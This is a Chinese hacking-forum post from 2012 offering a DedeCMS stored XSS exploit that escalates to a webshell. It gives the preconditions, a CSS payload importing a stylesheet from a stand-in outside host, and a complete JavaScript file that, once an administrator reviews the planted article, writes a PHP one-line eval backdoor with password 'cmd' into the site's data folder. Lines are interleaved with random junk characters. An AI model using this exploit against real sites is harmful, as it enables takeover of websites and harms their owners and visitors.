找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1743|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell% C8 N* r* {6 s. i/ [4 z
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
# o7 @, a6 v: i# M目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。" u% D* g7 T) d- z4 p& C
下面说说利用方法。
. _& H- M$ w! r条件有2个:: W* L& Z; b+ O: }& E/ l
1.开启注册2 Y, g9 F: S# }
2.开启投稿
" A* D8 s2 v( D+ {0 t9 Z: n注册会员----发表文章6 n4 @5 j# R$ U0 T' j  o9 V' q6 S
内容填写:+ u7 N' j5 _4 c7 [+ m. o4 g0 S
复制代码' P2 U& i  N+ c4 R4 `) N9 X! {8 e' J
<style>@im\port'\http://xxx.com/xss.css';</style>
! c* E0 n: }; p" g2 R! H# V" R新建XSS.Css. Z' ?7 |  W: W; B- m$ U& B
复制代码/ v4 R4 L8 v2 ~, g* R3 K
.body{
; P9 k- q$ j; S% @( z; j# y' P& G/ mbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }3 {' G5 t/ S' S* b* [) g" i# z
新建xss.js 内容为6 G4 k8 d/ X1 |0 [+ b% f
复制代码0 @1 s9 Z* n1 C# i! L, G
1.var request = false;, n, J! i. p) I
2.if(window.XMLHttpRequest) {
* _6 x+ t. l+ R+ L  b3.request = new XMLHttpRequest();+ J( n$ c+ ]. y! Q6 ~
4.if(request.overrideMimeType) {- q$ t; _+ q$ e% H, B8 R% Z
5.request.overrideMimeType('text/xml');7 f" b; r9 R3 q$ W& B6 ~
6.}  t6 O6 c: x& \
7.} else if(window.ActiveXObject) {% f. c0 o/ }7 u+ }
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
/ M( h# B1 @9 G# }9.for(var i=0; i<versions.length; i++) {
1 j+ `0 r0 K7 Z# c6 A; V10.try {8 ^9 p- C* s+ E: v; Z
11.request = new ActiveXObject(versions);: b* U' R, l9 W# G" p1 G
12.} catch(e) {}8 b' ~. s8 ^8 l
13.}
+ Y1 K' y7 p+ |. T14.}
$ Z1 S& m2 a, g/ D! q% [15.xmlhttp=request;2 w  i: q- t) B3 o: s# Z( g+ I0 N
16.function getFolder( url ){2 |/ |* m) y; j7 `( ~
17. obj = url.split('/')3 u$ H" }) G+ ~! f; ^
18. return obj[obj.length-2]  t  K  w0 t. s% X& D
19.}1 U7 x% |" V( T2 z/ _; C
20.oUrl = top.location.href;% y9 |) a9 V) Q6 u4 h4 z
21.u = getFolder(oUrl);
1 D3 a5 ]) L. k( Z22.add_admin();$ v9 f- \+ d+ t& _8 T' n$ A5 k
23.function add_admin(){
' @2 B) D% `6 A( s, j24.var url= "/"+u+"/sys_sql_query.php";9 B9 P0 |' j# z' R
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
# q& h" J- ]5 c& B3 S26.xmlhttp.open("POST", url, true);
" B, m) M) \  [. Q$ v8 y( M27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
. \  ^) A& c4 x# j/ P28.xmlhttp.setRequestHeader("Content-length", params.length);* E2 A( V& p0 Q/ ]
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");" W. J9 X! [3 U8 T* ?
30.xmlhttp.send(params);( W" F* X# }! H* Y
31.}( `' ^2 F) B5 m9 ~! D; n
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表